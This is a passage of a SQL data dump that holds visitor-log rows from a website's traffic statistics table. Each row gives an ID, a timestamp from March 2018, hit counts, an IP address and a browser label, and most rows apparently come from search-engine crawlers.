),(221942,1521335924,4,4,0,0,'95.91.13.15','other'),(221943,1521335983,1,1,0,0,'54.36.149.44','other'),(221944,1521336069,2,2,0,0,'178.154.171.88','other'),(221945,1521336210,1,1,0,0,'54.210.107.179','other'),(221946,1521336248,1,0,1,0,'66.249.66.201',''),(221947,1521337145,1,1,0,0,'54.36.149.4','other'),(221948,1521337326,3,3,0,0,'46.229.173.137','other'),(221949,1521337399,1,1,0,0,'54.36.149.56','other'),(221950,1521337507,1,1,0,0,'54.210.107.179','other'),(221951,1521337779,2,2,0,0,'163.172.13.38','other'),(221952,1521338282,1,1,0,0,'66.249.66.157','chrome'),(221953,1521338290,1,1,0,0,'66.249.66.199','chrome'),(221954,1521338858,2,2,0,0,'178.154.171.88','other'),(221955,1521339016,1,1,0,0,'54.165.59.7','other'),(221956,1521339605,13,13,0,0,'46.229.173.137','other'),(221957,1521339883,1,1,0,0,'54.210.107.179','other'),(221958,1521339940,1,1,0,0,'46.161.9.39','chrome'),(221959,1521340096,1,0,1,0,'66.249.66.158',''),(221960,1521340102,1,0,1,0,'66.249.66.156',''),(221961,1521340878,1,1,0,0,'217.69.133.191','other'),(221962,1521341059,1,1,0,0,'141.8.142.74','other'),(221963,1521341099,1,1,0,0,'54.210.107.179','other'),(221964,1521341554,1,1,0,0,'54.36.148.150','other'),(221965,1521342044,1,1,0,0,'213.180.203.8','other'),(221966,1521342107,1,1,0,0,'178.154.171.88','other'),(221967,1521342198,1,1,0,0,'217.69.136.203','other'),(221968,1521342239,1,1,0,0,'54.210.107.179','other'),(221969,1521342571,1,1,0,0,'217.69.133.232','other'),(221970,1521343390,1,1,0,0,'54.210.107.179','other'),(221971,1521343442,1,1,0,0,'54.36.149.96','other'),(221972,1521343513,1,1,0,0,'54.36.148.145','other'),(221973,1521344096,1,1,0,0,'54.36.148.89','other'),(221974,1521344149,1,1,0,0,'54.36.148.40','other'),(221975,1521344211,1,1,0,0,'54.36.148.14','other'),(221976,1521344329,1,1,0,0,'54.36.149.71','other'),(221977,1521344415,1,1,0,0,'54.36.148.189','other'),(221978,1521344651,1,1,0,0,'54.210.107.179','other'),(221979,1521344734,1,0,1,0,'66.249.66.158',''),(221980,1521344966,1,1,0,0,'141.8.142.74','other'),(221981,1521345285,1,1,0,0,'35.226.23.240','other'),(221982,1521345515,1,1,0,0,'54.36.148.176','other'),(221983,1521345828,1,1,0,0,'8.29.198.26','other'),(221984,1521345875,1,1,0,0,'54.210.107.179','other'),(221985,1521345972,1,1,0,0,'178.154.171.88','other'),(221986,1521346233,1,0,1,0,'66.249.66.195',''),(221987,1521346803,1,1,0,0,'54.36.148.74','other'),(221988,1521346976,1,1,0,0,'54.210.107.179','other'),(221989,1521347773,1,1,0,0,'54.36.148.18','other'),(221990,1521348212,2,2,0,0,'54.36.148.158','other'),(221991,1521348218,1,1,0,0,'54.210.107.179','other'),(221992,1521348441,1,1,0,0,'40.77.167.35','other'),(221993,1521348956,1,1,0,0,'54.36.148.244','other'),(221994,1521349132,1,1,0,0,'54.36.148.12','other'),(221995,1521349146,1,1,0,0,'141.8.132.19','other'),(221996,1521349169,2,2,0,0,'92.112.125.105','chrome'),(221997,1521349290,1,1,0,0,'128.72.209.129','msie'),(221998,1521349459,1,1,0,0,'54.210.107.179','other'),(221999,1521349750,1,1,0,0,'40.77.167.78','other'),(222000,1521349786,1,1,0,0,'54.36.148.249','other'),(222001,1521349840,1,1,0,0,'54.36.148.181','other'),(222002,1521349880,1,1,0,0,'54.36.148.22','other'),(222003,1521349987,1,1,0,0,'216.244.66.237','other'),(222004,1521350317,3,3,0,0,'141.8.142.74','other'),(222005,1521351041,2,2,0,0,'91.196.178.35','chrome'),(222006,1521351317,1,1,0,0,'54.36.148.209','other'),(222007,1521351519,1,1,0,0,'54.36.148.230','other'),(222008,1521351965,1,1,0,0,'54.210.107.179','other'),(222009,1521352412,1,1,0,0,'54.36.148.152','other'),(222010,1521352724,1,1,0,0,'54.36.149.46','other'),(222011,1521353197,1,1,0,0,'54.210.107.179','other'),(222012,1521353404,1,1,0,0,'54.36.148.101','other'),(222013,1521353825,1,1,0,0,'54.36.148.59','other'),(222014,1521354349,1,1,0,0,'54.210.107.179','other'),(222015,1521354742,1,1,0,0,'87.250.224.46','other'),(222016,1521354752,2,2,0,0,'141.8.142.74','other'),(222017,1521355034,1,1,0,0,'31.41.68.27','chrome'),(222018,1521355516,1,1,0,0,'54.36.148.100','other'),(222019,1521355587,1,1,0,0,'54.210.107.179','other'),(222020,1521356128,1,1,0,0,'54.36.149.100','other'),(222021,1521356291,2,2,0,0,'141.8.142.74','other'),(222022,1521356306,1,1,0,0,'54.36.148.76','other'),(222023,1521356684,1,1,0,0,'8.29.198.25','other'),(222024,1521356763,1,1,0,0,'54.210.107.179','other'),(222025,1521356981,1,1,0,0,'213.180.203.8','other'),(222026,1521357105,1,1,0,0,'178.154.171.88','other'),(222027,1521357330,1,1,0,0,'141.8.142.74','other'),(222028,1521357565,1,0,1,0,'66.249.66.201',''),(222029,1521357987,1,1,0,0,'54.210.107.179','other'),(222030,1521358337,1,1,0,0,'54.36.148.144','other'),(222031,1521358561,1,1,0,0,'54.36.149.45','other'),(222032,1521358888,1,1,0,0,'54.36.149.68','other'),(222033,1521359148,1,1,0,0,'54.36.148.132','other'),(222034,1521359325,1,1,0,0,'54.210.107.179','other'),(222035,1521359902,2,2,0,0,'216.244.66.237','other'),(222036,1521359903,1,1,0,0,'54.36.149.49','other'),(222037,1521360463,1,1,0,0,'54.210.107.179','other'),(222038,1521360801,1,1,0,0,'54.36.148.25','other'),(222039,1521361435,1,1,0,0,'91.196.178.85','chrome'),(222040,1521361532,1,1,0,0,'217.69.133.231','other'),(222041,1521361706,1,1,0,0,'54.210.107.179','other'),(222042,1521361887,1,1,0,0,'184.94.240.92','firefox'),(222043,1521362524,1,1,0,0,'178.154.171.88','other'),(222044,1521362637,2,2,0,0,'92.112.125.105','chrome'),(222045,1521364197,1,1,0,0,'217.69.133.240','other'),(222046,1521364237,1,1,0,0,'54.210.107.179','other'),(222047,1521365558,1,1,0,0,'54.210.107.179','other'),(222048,1521365644,1,1,0,0,'5.248.9.74','firefox'),(222049,1521366903,1,1,0,0,'54.210.107.179','other'),(222050,1521367065,1,1,0,0,'87.250.224.46','other'),(222051,1521367525,1,1,0,0,'8.29.198.25','other'),(222052,1521367783,1,1,0,0,'141.8.142.74','other'),(222053,1521368071,1,1,0,0,'54.210.107.179','other'),(222054,1521368077,1,1,0,0,'91.196.178.52','chrome'),(222055,1521369387,1,1,0,0,'54.210.107.179','other'),(222056,1521369543,2,2,0,0,'141.8.142.74','other'),(222057,1521369545,1,1,0,0,'178.154.171.88','other'),(222058,1521369676,1,1,0,0,'204.79.180.1','msie'),(222059,1521370008,1,1,0,0,'91.196.178.45','chrome'),(222060,1521370287,1,1,0,0,'217.69.133.59','other'),(222061,1521370546,1,1,0,0,'37.9.113.115','other'),(222062,1521370853,1,1,0,0,'54.210.107.179','other'),(222063,1521372112,1,1,0,0,'54.210.107.179','other'),(222064,1521372136,1,1,0,0,'180.76.15.5','other'),(222065,1521372396,4,4,0,0,'5.9.106.230','other'),(222066,1521372557,1,1,0,0,'207.244.149.28','chrome'),(222067,1521372655,1,1,0,0,'87.250.224.46','other'),(222068,1521373307,1,1,0,0,'66.249.66.157','chrome'),(222069,1521373386,1,0,1,0,'66.249.66.158',''),(222070,1521373414,1,1,0,0,'95.158.38.193','chrome'),(222071,1521373481,34,34,0,0,'46.229.173.137','other'),(222072,1521373490,1,1,0,0,'54.210.107.179','other'),(222073,1521374386,9,9,0,0,'46.229.173.137','other'),(222074,1521374809,1,1,0,0,'54.210.107.179','other'),(222075,1521375463,1,1,0,0,'178.154.171.88','other'),(222076,1521376083,1,1,0,0,'217.69.133.60','other'),(222077,1521376934,1,1,0,0,'91.196.178.6','chrome'),(222078,1521377034,1,1,0,0,'216.244.66.194','other'),(222079,1521377422,1,1,0,0,'54.210.107.179','other'),(222080,1521378387,1,1,0,0,'8.29.198.25','other'),(222081,1521378783,2,2,0,0,'176.113.170.104','chrome'),(222082,1521378827,1,1,0,0,'54.210.107.179','other'),(222083,1521379407,1,1,0,0,'66.249.66.195','chrome'),(222084,1521380114,1,1,0,0,'54.210.107.179','other'),(222085,1521380548,10,10,0,0,'46.229.173.137','other'),(222086,1521381374,1,1,0,0,'180.76.15.12','other'),(222087,1521381401,1,0,1,0,'66.249.66.201',''),(222088,1521381508,1,1,0,0,'54.210.107.179','other'),(222089,1521382797,1,1,0,0,'54.210.107.179','other'),(222090,1521382891,1,1,0,0,'141.8.142.74','other'),(222091,1521383570,1,1,0,0,'178.93.148.204','chrome'),(222092,1521384011,1,1,0,0,'54.210.107.179','other'),(222094,1521384201,2,2,0,0,'178.154.171.88','other'),(222095,1521384261,1,1,0,0,'141.8.142.74','other'),(222096,1521384542,1,1,0,0,'66.249.66.195','chrome'),(222097,1521385278,1,1,0,0,'54.210.107.179','other'),(222098,1521385301,2,2,0,0,'91.196.178.3','chrome'),(222099,1521386020,6,6,0,0,'178.33.23.156','other'),(222100,1521386562,1,1,0,0,'54.210.107.179','other'),(222101,1521387089,2,2,0,0,'141.8.142.74','other'),(222102,1521387090,2,2,0,0,'178.154.171.88','other'),(222103,1521387101,1,1,0,0,'178.33.23.156','other'),(222104,1521387557,1,1,0,0,'87.250.224.46','other'),(222105,1521387846,1,1,0,0,'54.210.107.179','other'),(222106,1521387901,6,6,0,0,'46.229.173.137','other'),(222107,1521388385,1,1,0,0,'46.211.109.23','chrome'),(222108,1521388456,1,1,0,0,'141.8.142.74','other'),(222109,1521388512,1,0,1,0,'66.249.66.199',''),(222110,1521389067,1,1,0,0,'180.76.15.5','other'),(222111,1521389153,1,1,0,0,'178.154.171.88','other'),(222112,1521389239,1,1,0,0,'8.29.198.26','other'),(222113,1521390137,1,1,0,0,'91.196.177.40','chrome'),(222114,1521390484,1,1,0,0,'54.210.107.179','other'),(222115,1521391002,21,21,0,0,'46.229.173.137','other'),(222116,1521391845,1,1,0,0,'54.210.107.179','other'),(222117,1521392409,1,1,0,0,'54.36.149.104','other'),(222118,1521392951,1,1,0,0,'66.249.66.156','chrome'),(222119,1521392983,1,1,0,0,'54.36.148.138','other'),(222120,1521393152,1,1,0,0,'54.210.107.179','other'),(222121,1521393237,1,1,0,0,'54.36.148.33','other'),(222122,1521393322,1,1,0,0,'54.36.148.35','other'),(222123,1521394036,1,1,0,0,'188.230.43.254','other'),(222124,1521394081,1,1,0,0,'54.36.148.69','other'),(222125,1521394189,1,1,0,0,'54.36.148.185','other'),(222126,1521394299,1,1,0,0,'66.249.66.195','chrome'),(222127,1521394413,1,1,0,0,'54.210.107.179','other'),(222128,1521394614,1,1,0,0,'54.36.148.193','other'),(222129,1521395137,1,1,0,0,'54.36.148.91','other'),(222130,1521395214,1,1,0,0,'178.154.171.88','other'),(222131,1521395297,1,0,1,0,'66.249.66.199',''),(222132,1521395439,1,1,0,0,'54.36.148.67','other'),(222133,1521395774,1,1,0,0,'54.210.107.179','other'),(222134,1521395799,2,2,0,0,'92.112.125.105','chrome'),(222135,1521395803,1,1,0,0,'54.36.148.217','other'),(222136,1521395856,1,1,0,0,'54.36.148.234','other'),(222137,1521396019,1,1,0,0,'54.36.148.128','other'),(222138,1521396146,1,1,0,0,'54.36.148.140','other'),(222139,1521396233,1,1,0,0,'54.36.148.56','other'),(222140,1521396442,1,1,0,0,'54.36.149.6','other'),(222141,1521396907,1,1,0,0,'54.36.149.103','other'),(222142,1521397053,1,1,0,0,'54.210.107.179','other'),(222143,1521397078,2,2,0,0,'87.250.224.46','other'),(222144,1521397107,1,1,0,0,'54.36.148.23','other'),(222145,1521397567,2,2,0,0,'178.154.171.88','other'),(222146,1521397656,1,1,0,0,'141.8.142.74','other'),(222147,1521397952,1,1,0,0,'54.36.149.95','other'),(222148,1521398307,1,1,0,0,'54.210.107.179','other'),(222149,1521398509,1,1,0,0,'54.36.148.150','other'),(222150,1521398518,1,1,0,0,'54.36.148.106','other'),(222151,1521398736,1,0,1,0,'66.249.66.199',''),(222152,1521398937,1,1,0,0,'54.36.149.7','other'),(222153,1521399260,1,1,0,0,'54.36.149.53','other'),(222154,1521399523,1,1,0,0,'66.249.66.199','chrome'),(222155,1521399553,2,2,0,0,'178.154.171.88','other'),(222156,1521399601,1,1,0,0,'54.36.149.48','other'),(222157,1521399640,1,1,0,0,'54.210.107.179','other'),(222158,1521399710,1,1,0,0,'54.36.149.78','other'),(222159,1521399742,1,1,0,0,'54.36.148.125','other'),(222160,1521399801,1,1,0,0,'35.226.23.240','other'),(222161,1521400079,1,1,0,0,'8.29.198.26','other'),(222162,1521400275,4,4,0,0,'46.229.173.137','other'),(222163,1521400883,1,1,0,0,'54.210.107.179','other'),(222164,1521401027,1,1,0,0,'54.36.148.77','other'),(222165,1521401155,1,1,0,0,'54.36.149.52','other'),(222166,1521401247,1,1,0,0,'141.8.142.74','other'),(222167,1521401353,1,1,0,0,'54.36.148.83','other'),(222168,1521401755,1,1,0,0,'54.36.149.78','other'),(222169,1521402172,1,1,0,0,'216.244.66.237','other'),(222170,1521402347,1,1,0,0,'54.36.149.36','other'),(222171,1521402463,1,1,0,0,'54.36.148.16','other'),(222172,1521402479,1,1,0,0,'54.36.149.5','other'),(222173,1521402619,1,1,0,0,'178.154.171.88','other'),(222174,1521402859,1,1,0,0,'54.36.149.55','other'),(222175,1521402940,1,1,0,0,'54.36.149.8','other'),(222176,1521403106,1,1,0,0,'217.69.133.190','other'),(222177,1521403126,1,1,0,0,'54.36.148.172','other'),(222178,1521403218,1,1,0,0,'54.36.148.76','other'),(222179,1521403243,1,1,0,0,'54.36.148.148','other'),(222180,1521403413,1,1,0,0,'54.36.149.58','other'),(222181,1521403416,1,1,0,0,'54.210.107.179','other'),(222182,1521403473,1,1,0,0,'54.36.148.124','other'),(222183,1521403629,4,4,0,0,'46.229.173.137','other'),(222184,1521404270,1,1,0,0,'91.196.178.97','chrome'),(222185,1521404664,1,1,0,0,'54.36.149.34','other'),(222186,1521404674,1,1,0,0,'54.210.107.179','other'),(222187,1521404768,2,2,0,0,'178.154.171.88','other'),(222188,1521404771,1,1,0,0,'141.8.142.74','other'),(222189,1521404831,1,1,0,0,'54.36.149.75','other'),(222190,1521405335,1,1,0,0,'54.36.148.233','other'),(222191,1521405542,1,1,0,0,'54.36.148.224','other'),(222192,1521405561,1,1,0,0,'54.36.148.255','other'),(222193,1521405674,1,1,0,0,'54.36.149.38','other'),(222194,1521405825,49,49,0,0,'167.114.219.41','other'),(222195,1521405994,1,1,0,0,'54.210.107.179','other'),(222196,1521406350,1,1,0,0,'54.36.148.126','other'),(222197,1521406445,1,1,0,0,'178.154.171.88','other'),(222198,1521406449,1,1,0,0,'54.36.148.253','other'),(222199,1521406455,1,1,0,0,'141.8.142.74','other'),(222200,1521406576,1,1,0,0,'54.36.148.179','other'),(222201,1521406610,1,1,0,0,'54.36.149.0','other'),(222202,1521407043,1,1,0,0,'54.36.148.170','other'),(222203,1521407097,21,21,0,0,'46.229.173.137','other'),(222204,1521407214,1,1,0,0,'54.210.107.179','other'),(222205,1521407248,1,1,0,0,'216.244.66.237','other'),(222206,1521407449,1,1,0,0,'54.36.148.246','other'),(222207,1521407514,1,1,0,0,'54.36.149.10','other'),(222208,1521408026,1,1,0,0,'35.226.23.240','other'),(222209,1521408125,1,1,0,0,'54.36.148.219','other'),(222210,1521408250,1,1,0,0,'54.36.148.52','other'),(222211,1521408449,1,1,0,0,'54.210.107.179','other'),(222212,1521408554,1,1,0,0,'216.244.66.237','other'),(222213,1521408586,1,1,0,0,'54.36.148.190','other'),(222214,1521409520,1,1,0,0,'54.36.148.49','other'),(222215,1521409796,1,1,0,0,'54.210.107.179','other'),(222216,1521409981,1,1,0,0,'46.229.173.137','other'),(222217,1521410160,1,1,0,0,'54.36.148.239','other'),(222218,1521410315,1,1,0,0,'216.244.66.237','other'),(222219,1521410402,1,1,0,0,'178.154.171.88','other'),(222220,1521410540,1,1,0,0,'54.36.149.20','other'),(222221,1521410605,1,1,0,0,'54.36.149.14','other'),(222222,1521410927,1,1,0,0,'8.29.198.26','other'),(222223,1521411058,1,1,0,0,'54.210.107.179','other'),(222224,1521411155,1,1,0,0,'217.69.133.237','other'),(222225,1521411751,1,1,0,0,'54.36.148.129','other'),(222226,1521411930,3,3,0,0,'178.154.171.88','other'),(222227,1521411934,2,2,0,0,'141.8.142.74','other'),(222228,1521412181,1,1,0,0,'54.36.148.96','other'),(222229,1521412198,1,1,0,0,'54.210.107.179','other'),(222230,1521412369,1,1,0,0,'178.95.247.110','chrome'),(222231,1521412374,1,1,0,0,'54.36.148.220','other'),(222232,1521412474,1,1,0,0,'54.36.149.100','other'),(222233,1521412513,1,1,0,0,'54.36.149.75','other'),(222234,1521412620,1,1,0,0,'54.36.148.217','other'),(222235,1521412746,1,1,0,0,'54.36.148.44','other'),(222236,1521412894,1,1,0,0,'54.36.149.106','other'),(222237,1521412916,1,1,0,0,'54.36.149.69','other'),(222238,1521413021,1,1,0,0,'217.69.133.15','other'),(222239,1521413034,1,1,0,0,'54.36.149.1','other'),(222240,1521413066,1,1,0,0,'54.36.149.9','other'),(222241,1521413475,14,14,0,0,'23.237.4.26','other'),(222242,1521413496,1,1,0,0,'54.210.107.179','other'),(222243,1521413504,1,1,0,0,'216.244.66.237','other'),(222244,1521414016,1,1,0,0,'54.36.148.46','other'),(222245,1521414263,1,1,0,0,'54.36.149.74','other'),(222246,1521414584,2,2,0,0,'141.8.142.74','other'),(222247,1521414868,1,1,0,0,'54.36.149.65','other'),(222248,1521415005,2,0,2,0,'66.249.73.23',''),(222249,1521415010,2,0,2,0,'66.249.73.24',''),(222250,1521415055,1,1,0,0,'54.36.148.202','other'),(222251,1521415223,1,1,0,0,'54.36.149.38','other'),(222252,1521415523,1,1,0,0,'54.36.149.44','other'),(222253,1521415583,1,1,0,0,'217.69.133.221','other'),(222254,1521415609,1,1,0,0,'54.36.148.22','other'),(222255,1521415700,1,1,0,0,'54.36.148.119','other'),(222256,1521415909,1,1,0,0,'54.36.148.241','other'),(222257,1521415929,1,1,0,0,'54.210.107.179','other'),(222258,1521415955,1,1,0,0,'54.36.148.214','other'),(222259,1521416161,1,1,0,0,'178.154.171.88','other'),(222260,1521416206,1,1,0,0,'141.8.142.74','other'),(222261,1521416226,1,1,0,0,'54.36.148.129','other'),(222262,1521416408,1,0,1,0,'66.249.73.93',''),(222263,1521416759,1,1,0,0,'66.249.73.89','chrome'),(222264,1521416890,1,1,0,0,'46.229.173.137','other'),(222265,1521417124,1,1,0,0,'54.36.148.81','other'),(222266,1521417163,1,1,0,0,'141.8.142.74','other'),(222267,1521417259,1,1,0,0,'54.210.107.179','other'),(222268,1521418351,1,1,0,0,'87.250.224.46','other'),(222269,1521418454,1,1,0,0,'54.36.148.222','other'),(222270,1521418581,1,1,0,0,'54.210.107.179','other'),(222271,1521419039,1,1,0,0,'54.36.148.150','other'),(222272,1521419341,1,1,0,0,'54.36.149.101','other'),(222273,1521419343,1,1,0,0,'54.36.148.117','other'),(222274,1521419692,1,0,1,0,'66.249.73.25',''),(222275,1521419745,1,1,0,0,'54.210.107.179','other'),(222276,1521420246,27,27,0,0,'46.229.173.137','other'),(222277,1521420574,1,1,0,0,'54.36.149.52','other'),(222278,1521420651,1,0,1,0,'66.249.73.23',''),(222279,1521420678,1,0,1,0,'66.249.73.91',''),(222280,1521420822,1,1,0,0,'54.36.148.19','other'),(222281,1521421012,1,1,0,0,'54.210.107.179','other'),(222282,1521421084,1,1,0,0,'54.36.148.69','other'),(222283,1521421667,2,2,0,0,'141.8.142.74','other'),(222284,1521421786,1,1,0,0,'8.29.198.25','other'),(222285,1521422018,1,1,0,0,'54.36.148.223','other'),(222286,1521422325,1,1,0,0,'54.210.107.179','other'),(222287,1521422344,1,1,0,0,'54.36.148.10','other'),(222288,1521422490,1,1,0,0,'54.36.148.192','other'),(222289,1521422588,2,2,0,0,'87.250.224.46','other'),(222290,1521422608,1,1,0,0,'54.36.149.40','other'),(222291,1521422638,1,1,0,0,'54.36.148.240','other'),(222292,1521422643,2,0,2,0,'66.249.73.23',''),(222293,1521422807,1,1,0,0,'54.36.148.108','other'),(222294,1521423212,1,1,0,0,'178.154.171.88','other'),(222295,1521423230,1,1,0,0,'216.244.66.194','other'),(222296,1521423582,1,1,0,0,'54.210.107.179','other'),(222297,1521423702,1,1,0,0,'54.36.149.17','other'),(222298,1521423737,6,6,0,0,'46.229.173.137','other'),(222299,1521423827,1,1,0,0,'54.36.148.70','other'),(222300,1521424292,1,1,0,0,'87.250.224.46','other'),(222301,1521424568,1,1,0,0,'54.36.148.238','other'),(222302,1521424780,2,2,0,0,'216.244.66.237','other'),(222303,1521424946,1,1,0,0,'54.210.107.179','other'),(222304,1521424955,1,1,0,0,'54.36.148.102','other'),(222305,1521425024,1,1,0,0,'54.36.148.91','other'),(222306,1521425071,1,1,0,0,'54.36.148.49','other'),(222307,1521425194,1,1,0,0,'141.8.142.74','other'),(222308,1521425816,1,1,0,0,'87.250.224.46','other'),(222309,1521425875,1,1,0,0,'178.154.171.88','other'),(222310,1521426186,1,1,0,0,'54.36.149.42','other'),(222311,1521426195,1,1,0,0,'54.210.107.179','other'),(222312,1521426508,1,1,0,0,'141.8.142.74','other'),(222313,1521427214,2,2,0,0,'46.229.173.137','other'),(222314,1521427411,1,1,0,0,'54.36.149.61','other'),(222315,1521427613,1,1,0,0,'54.36.148.149','other'),(222316,1521428155,1,1,0,0,'91.209.11.236','other'),(222317,1521428253,1,1,0,0,'54.36.148.216','other'),(222318,1521428356,1,1,0,0,'54.36.148.209','other'),(222319,1521428682,1,1,0,0,'54.36.148.151','other'),(222320,1521428816,1,1,0,0,'54.210.107.179','other'),(222321,1521428891,1,1,0,0,'54.36.148.250','other'),(222322,1521429535,1,1,0,0,'54.36.149.55','other'),(222323,1521429996,1,1,0,0,'54.36.149.35','other'),(222324,1521430074,1,1,0,0,'54.210.107.179','other'),(222325,1521430087,1,1,0,0,'54.36.148.18','other'),(222326,1521430403,1,1,0,0,'54.36.148.255','other'),(222327,1521430525,3,3,0,0,'46.229.173.137','other'),(222328,1521430557,1,1,0,0,'54.36.148.113','other'),(222329,1521430654,1,1,0,0,'54.36.149.58','other'),(222330,1521430833,1,1,0,0,'54.36.148.193','other'),(222331,1521431003,1,1,0,0,'54.36.148.102','other'),(222332,1521431014,2,2,0,0,'178.154.171.88','other'),(222333,1521431156,1,1,0,0,'141.8.142.74','other'),(222334,1521431319,1,1,0,0,'54.36.149.51','other'),(222335,1521431374,1,1,0,0,'217.69.133.193','other'),(222336,1521431446,1,1,0,0,'54.210.107.179','other'),(222337,1521431571,1,1,0,0,'216.244.66.246','other'),(222338,1521431652,1,1,0,0,'54.36.148.202','other'),(222339,1521431768,4,4,0,0,'92.112.125.105','chrome'),(222340,1521431773,1,1,0,0,'54.36.148.130','other'),(222341,1521432508,2,2,0,0,'141.8.142.74','other'),(222342,1521432549,1,1,0,0,'54.36.148.224','other'),(222343,1521432642,1,1,0,0,'8.29.198.25','other'),(222344,1521432663,1,1,0,0,'54.210.107.179','other'),(222345,1521432821,1,1,0,0,'35.226.23.240','other'),(222346,1521432871,1,1,0,0,'54.36.148.100','other'),(222347,1521433046,1,1,0,0,'54.36.148.82','other'),(222348,1521433049,1,1,0,0,'54.36.149.49','other'),(222349,1521433063,1,1,0,0,'54.36.149.66','other'),(222350,1521433648,1,1,0,0,'54.36.148.121','other'),(222351,1521433690,1,1,0,0,'40.77.167.26','other'),(222352,1521433932,1,1,0,0,'54.210.107.179','other'),(222353,1521433994,2,0,2,0,'66.249.73.23',''),(222354,1521435252,1,1,0,0,'54.36.148.219','other'),(222355,1521435276,1,1,0,0,'54.210.107.179','other'),(222356,1521435365,1,1,0,0,'54.36.149.1','other'),(222357,1521435843,1,1,0,0,'54.36.148.147','other'),(222358,1521435994,1,1,0,0,'54.36.148.244','other'),(222359,1521436368,1,1,0,0,'54.36.148.31','other'),(222360,1521436476,1,1,0,0,'141.8.142.74','other'),(222361,1521436558,1,1,0,0,'54.36.148.215','other'),(222362,1521436666,1,1,0,0,'54.210.107.179','other'),(222363,1521436901,2,2,0,0,'178.154.171.88','other'),(222364,1521436910,1,1,0,0,'157.55.39.190','other'),(222365,1521437425,5,5,0,0,'71.13.87.122','other'),(222366,1521437629,1,1,0,0,'216.244.66.237','other'),(222367,1521437933,1,1,0,0,'54.36.148.202','other'),(222368,1521437974,1,1,0,0,'54.210.107.179','other'),(222369,1521438275,1,1,0,0,'54.36.148.191','other'),(222370,1521438388,1,1,0,0,'54.36.148.83','other'),(222371,1521438544,1,1,0,0,'37.9.113.132','other'),(222372,1521438622,1,1,0,0,'54.36.149.92','other'),(222373,1521439198,1,1,0,0,'141.8.142.74','other'),(222374,1521439351,1,1,0,0,'54.210.107.179','other'),(222375,1521439493,2,2,0,0,'77.111.244.65','chrome'),(222376,1521439641,1,1,0,0,'54.36.148.145','other'),(222377,1521439768,1,1,0,0,'91.196.178.79','firefox'),(222378,1521439786,1,1,0,0,'54.36.148.24','other'),(222379,1521439816,1,1,0,0,'157.55.39.160','other'),(222380,1521439852,1,1,0,0,'37.9.113.114','other'),(222381,1521440150,1,1,0,0,'54.36.148.232','other'),(222382,1521440374,1,1,0,0,'54.36.148.102','other'),(222383,1521441052,1,1,0,0,'54.36.148.239','other'),(222384,1521441273,1,1,0,0,'54.36.149.104','other'),(222385,1521441305,1,1,0,0,'54.36.149.2','other'),(222386,1521441807,1,1,0,0,'54.36.148.152','other'),(222387,1521441947,1,1,0,0,'54.210.107.179','other'),(222388,1521442359,1,1,0,0,'54.36.148.119','other'),(222389,1521442788,1,1,0,0,'207.46.13.165','other'),(222390,1521442871,1,1,0,0,'37.9.113.182','other'),(222391,1521442984,1,1,0,0,'54.36.148.221','other'),(222392,1521443249,1,1,0,0,'54.36.149.61','other'),(222393,1521443299,1,1,0,0,'54.210.107.179','other'),(222394,1521443505,1,1,0,0,'8.29.198.25','other'),(222395,1521444148,1,1,0,0,'54.36.148.198','other'),(222396,1521444343,1,0,1,0,'66.249.73.24',''),(222397,1521444600,1,1,0,0,'54.210.107.179','other'),(222398,1521444898,1,1,0,0,'5.45.207.82','other'),(222399,1521444916,1,1,0,0,'54.36.149.52','other'),(222400,1521445000,1,1,0,0,'54.36.148.202','other'),(222401,1521445390,1,1,0,0,'54.36.148.185','other'),(222402,1521445747,2,2,0,0,'77.111.246.7','chrome'),(222403,1521445808,1,1,0,0,'180.76.15.159','other'),(222404,1521445903,1,1,0,0,'54.210.107.179','other'),(222405,1521445988,1,1,0,0,'54.36.148.237','other'),(222406,1521446174,1,1,0,0,'178.154.171.88','other'),(222407,1521446304,1,1,0,0,'54.36.148.105','other'),(222408,1521447087,1,1,0,0,'54.36.149.48','other'),(222409,1521447187,1,1,0,0,'54.210.107.179','other'),(222410,1521447634,1,1,0,0,'54.36.148.209','other'),(222411,1521447762,1,1,0,0,'54.36.149.1','other'),(222412,1521447771,1,1,0,0,'37.53.185.128','chrome'),(222413,1521447974,1,1,0,0,'77.111.244.21','chrome'),(222414,1521448054,2,2,0,0,'91.196.178.45','chrome'),(222415,1521448113,1,1,0,0,'54.36.149.86','other'),(222416,1521448488,1,1,0,0,'54.210.107.179','other'),(222417,1521448676,1,1,0,0,'54.36.149.101','other'),(222418,1521448748,1,0,1,0,'66.249.73.25',''),(222419,1521448762,1,1,0,0,'54.36.148.102','other'),(222420,1521448794,1,1,0,0,'176.116.78.38','chrome'),(222421,1521448850,1,1,0,0,'54.36.149.12','other'),(222422,1521448885,2,2,0,0,'91.196.178.101','chrome'),(222423,1521448966,1,1,0,0,'54.36.149.16','other'),(222424,1521449126,4,4,0,0,'178.154.171.88','other'),(222425,1521449137,1,1,0,0,'87.250.224.46','other'),(222426,1521449140,6,6,0,0,'141.8.142.74','other'),(222427,1521449152,1,1,0,0,'54.36.149.34','other'),(222428,1521449331,1,1,0,0,'54.36.148.255','other'),(222429,1521449660,1,1,0,0,'92.112.125.243','chrome'),(222430,1521449846,1,1,0,0,'54.210.107.179','other'),(222431,1521450389,1,1,0,0,'54.36.149.48','other'),(222432,1521450430,1,1,0,0,'54.36.148.212','other'),(222433,1521450481,1,1,0,0,'54.36.149.88','other'),(222434,1521450774,1,1,0,0,'54.36.149.101','other'),(222435,1521450825,1,1,0,0,'54.36.148.238','other'),(222436,1521450834,1,1,0,0,'54.36.148.39','other'),(222437,1521450969,1,1,0,0,'54.36.148.222','other'),(222438,1521451064,1,1,0,0,'54.36.148.179','other'),(222439,1521451072,1,1,0,0,'54.36.148.20','other'),(222440,1521451210,1,1,0,0,'54.210.107.179','other'),(222441,1521451267,4,4,0,0,'91.196.178.94','chrome'),(222442,1521451269,1,1,0,0,'54.36.148.139','other'),(222443,1521451411,1,1,0,0,'178.154.171.88','other'),(222444,1521451496,1,1,0,0,'54.36.148.67','other'),(222445,1521451614,1,1,0,0,'54.36.149.27','other'),(222446,1521451745,1,1,0,0,'54.36.148.35','other'),(222447,1521451805,1,1,0,0,'91.196.178.93','other'),(222448,1521451963,1,1,0,0,'141.8.142.74','other'),(222449,1521452301,2,2,0,0,'91.196.178.94','chrome'),(222450,1521452592,1,1,0,0,'54.210.107.179','other'),(222451,1521452979,1,1,0,0,'54.36.149.0','other'),(222452,1521453104,1,1,0,0,'95.132.133.35','firefox'),(222453,1521453218,2,2,0,0,'78.111.190.141','chrome'),(222454,1521453359,1,1,0,0,'54.36.148.185','other'),(222455,1521453618,1,1,0,0,'216.244.66.246','other'),(222456,1521453650,1,1,0,0,'35.226.23.240','other'),(222457,1521453661,1,1,0,0,'95.132.10.